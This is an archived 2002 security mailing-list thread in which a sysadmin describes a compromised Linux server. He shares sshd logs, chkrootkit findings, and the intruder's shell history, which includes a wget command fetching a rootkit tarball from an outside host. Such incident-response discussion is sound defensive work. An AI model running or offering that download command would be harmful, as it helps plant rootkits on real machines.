OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Ver Allan Sumabat (ver_allan_at_yahoo.com)
Date: Wed Sep 11 2002 - 22:15:42 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    we used linux 2.4.7-10. we only opened ports 21 (ftp),
    22 (ssh), and 443 (https).

    21 - wu-ftpd-2.6.1-20
    22 - openssh-3.1
    443 - tomcat-3.2.4

    1. this is the content of /home/war's .bash_history:

    wget
    wget http://mrunix.free.fr/roy/w00tkit.tgz
    logout

    2. he was trying to send a mail to himself regarding
    the system's resources:

    The original message was received at Thu, 5 Sep 2002
    22:21:37 +0800
    from rootlocalhost

       ----- The following addresses had permanent fatal
    errors -----
    roi_blablawalla.co.il
        (reason: 501 5.1.8 Sender domain must exist)

       ----- Transcript of session follows -----
    ... while talking to rmail.walla.co.il.:
    >>> MAIL From:<rootsrv1.iconnect.com.ph> SIZE=2283
    <<< 501 5.1.8 Sender domain must exist
    501 5.6.0 Data format error

    3. walla.co.il is in israel

    4. tracing 212.179.207.211 gives israel also.

    i have moved the files to another machine and
    reinstalled the server 'cause we need to put it up and
    running asap. do u think the exploit was done thru
    ftp? can u help me replicate it? i was looking for
    procedures or scripts in ssh/ftp exploits so that i
    can try to attack our server but i can not find any.

    --- Loki <lokifatelabs.com> wrote:
    > What version of SSHD were you running, check
    > commonly exploited
    > services.
    >
    > 1. SSHD (crc32)
    > 2. FTPD
    > 3. Apache (chunking)
    >
    > Get back to us with the versions you were running of
    > SSH, FTP, and
    > Apache and we can help you out. How hardened was the
    > OS? Did you turn
    > off all RPC services, etc. We need more info.
    >
    > Eric/Loki
    > Internet Warfare and Intelligence
    > Fate Research Labs
    > www.fatelabs.com
    >
    >
    >
    >
    >
    >
    >
    >
    >
    >
    >
    >
    >
    >
    >
    >
    >
    > -----Original Message-----
    > From: Ver Allan Sumabat [mailto:ver_allanyahoo.com]
    >
    > Sent: Tuesday, September 10, 2002 6:08 AM
    > To: incidentssecurityfocus.com
    > Subject: possible ssh hack
    >
    >
    > Hi,
    >
    > We have just recently been hacked. I have no idea
    > how
    > he came in. Here are my preliminary investigations:
    >
    > 1. He was able to add a user without logging in.
    >
    > **Unmatched Entries**
    > Sep 5 10:39:33 srv1 sshd[20514]: Could not reverse
    > map address 10.13.41.4.
    > Sep 5 10:39:35 srv1 sshd[20514]: Accepted password
    > for root from 10.13.41.4
    > port 4207
    > Sep 5 17:30:36 srv1 sshd[23299]: Could not reverse
    > map address 10.13.41.4.
    > Sep 5 17:30:41 srv1 sshd[23299]: Accepted password
    > for root from 10.13.41.4
    > port 2491
    > Sep 5 22:16:59 srv1 useradd[23532]: new group:
    > name=war, gid=502
    > Sep 5 22:16:59 srv1 useradd[23532]: new user:
    > name=war, uid=502, gid=502,
    > home=/home/war, shell=/bin/bash
    > Sep 5 22:17:31 srv1 sshd[23534]: Accepted password
    > for war from
    > 212.179.207.211 port 2746
    > Sep 5 22:19:17 srv1 sshd[23580]: fatal: Read from
    > socket failed: Connection
    > reset by peer
    > Sep 5 22:21:48 srv1 sshd[928]: Received SIGHUP;
    > restarting.
    >
    >
    > 2. He installed a tarball w00tkit.tgz in /home/war
    >
    > 3. After running chkrootkit, the significant lines
    > are:
    >
    > ...
    > Checking `ifconfig'... INFECTED
    > ...
    > Searching for Showtee... Warning: Possible Showtee
    > Rootkit installed
    > ...
    > Checking `lkm'... You have 1 process hidden for
    > ps
    > command
    > Warning: Possible LKM Trojan installed
    >
    > 4. ssh won't run anymore
    >
    > Can anyone help me on how the intrusion was done?
    >
    > Thanks.
    >
    > Regards,
    >
    > Allan
    >
    > __________________________________________________
    > Yahoo! - We Remember
    > 9-11: A tribute to the more than 3,000 lives lost
    > http://dir.remember.yahoo.com/tribute
    >
    >
    ------------------------------------------------------------------------
    > ----
    > This list is provided by the SecurityFocus ARIS
    > analyzer service. For
    > more information on this free incident handling,
    > management
    > and tracking system please see:
    > http://aris.securityfocus.com
    >
    >
    >
    ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus ARIS
    > analyzer service.
    > For more information on this free incident handling,
    > management
    > and tracking system please see:
    > http://aris.securityfocus.com
    >

    __________________________________________________
    Do you Yahoo!?
    Yahoo! News - Today's headlines
    http://news.yahoo.com

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com